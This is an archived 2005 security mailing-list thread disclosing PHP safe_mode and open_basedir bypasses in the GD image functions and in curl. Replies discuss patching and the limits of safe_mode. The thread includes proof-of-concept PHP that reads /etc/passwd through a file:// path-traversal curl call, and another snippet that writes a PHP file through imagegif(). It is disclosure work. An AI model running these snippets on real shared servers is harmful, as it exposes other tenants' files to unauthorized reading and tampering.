Re: [Full-disclosure] PHP Safedir Restriction Bypass Vulnerabilities

2005-10-18 Thread Stefan Esser 
Hello,

> In reguads to the the curl, I have just checked all the php curl code
> this was fixed in 4.3.10 from what i can see, because i wrote a patch
> to stop the openbase dir in curl until php fixed it, i submited it
> along time ago but the php dev's were all "blah blah blah 3rd party
> software blah blah not our problem"

Just because you close one (more) file:// hole with a patch, you do not
solve the 3rd party library problem. As long you have CURL compiled with
file:// support you can bypass safe_mode/open basedir in PHP. There are
enough hidden features in libcurl that allow to feed it with file://
URLs without PHP ever knowing about it.

Just face it safe_mode is not safe, was never and will never be. It is
simply impossible for an application to put access control restrictions
over (hidden) features of 3rd party libraries, that are not exported.
And with PHP6 safe_mode, register_globals and all the crap will most
probably disappear.

Stefan

-- 
--
 Stefan Esser   [EMAIL PROTECTED]
 Hardened-PHP Project http://www.hardened-php.net/

 GPG-Keygpg --keyserver pgp.mit.edu --recv-key 0x15ABDA78
 Key fingerprint   7806 58C8 CFA8 CE4A 1C2C  57DD 4AE1 795E 15AB DA78
--

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] PHP Safedir Restriction Bypass Vulnerabilities

2005-10-18 Thread VeNoMouS 



In reguads to the the curl, I have just checked all the php curl code this was fixed in 4.3.10 from 
what i can see, because i wrote a patch to stop the openbase dir in 
curl until php fixed it, i submited it along time ago but the php dev's 
were all "blah blah blah 3rd party software blah blah not our problem" 

 
im not sure if theres a patch for the imagegif() as 
i havent seen that one before.

  - Original Message - 
  From: 
  peter MC 
  tachatte 
  To: full-disclosure@lists.grok.org.uk 
  
  Sent: Tuesday, October 18, 2005 9:55 
  AM
  Subject: [Full-disclosure] PHP Safedir 
  Restriction Bypass Vulnerabilities
  
  There is a vulnerability (Safedir Restriction Bypass) identified 
  within the GD extension affectingthe following functions:- 
  imagegif()- imagepng()- imagejpeg()in /ext/gd/gd.c  line 
  1647Which is now fixed in the cvshttp://cvs.php.net/co.php/php-src/ext/gd/gd.c?r=1.312.2.1#1786 
  POC:
  with an image like http://81.57.125.106/~slythers/file.gif 
      $im = 
  imagecreatefromgif("file.gif");    imagegif($im, 
  '/var/www/f34r.fr/c/f/elbossoso/.i.need.money.php');?>curl 
  openbasedir and safemode bypass. POC:
  
  
  mkdir("./".$_SERVER["SCRIPT_NAME"]."?");$ch = curl_init("file://".$_SERVER["SCRIPT_FILENAME"]."?/../../../../../../../../../../../etc/passwd 
  ");
  $file=curl_exec($ch);
  echo $file;
  ?>
  As you notice, we can bypass the safedir which leads to access to anyfiles on any shared 
  servers.This is fixed in the cvs. 
  [EMAIL PROTECTED]
  greets: david coallier <[EMAIL PROTECTED]>
  
  

  ___Full-Disclosure - We 
  believe in it.Charter: 
  http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored 
  by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] PHP Safedir Restriction Bypass Vulnerabilities

2005-10-17 Thread peter MC tachatte 
There is a vulnerability (Safedir Restriction Bypass) identified within the GD extension affectingthe following functions:- imagegif()- imagepng()- imagejpeg()in /ext/gd/gd.c  line 1647
Which is now fixed in the cvshttp://cvs.php.net/co.php/php-src/ext/gd/gd.c?r=1.312.2.1#1786
POC:
with an image like http://81.57.125.106/~slythers/file.gif
    $im = imagecreatefromgif("file.gif");    imagegif($im, '/var/www/f34r.fr/c/f/elbossoso/.i.need.money.php');?>curl openbasedir and safemode bypass.
POC:


mkdir("./".$_SERVER["SCRIPT_NAME"]."?");$ch = curl_init("file://".$_SERVER["SCRIPT_FILENAME"]."?/../../../../../../../../../../../etc/passwd
");
$file=curl_exec($ch);
echo $file;
?>
As you notice, we can bypass the safedir which leads to access to anyfiles on any shared servers.This is fixed in the cvs. 
[EMAIL PROTECTED]
greets: david coallier <[EMAIL PROTECTED]>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/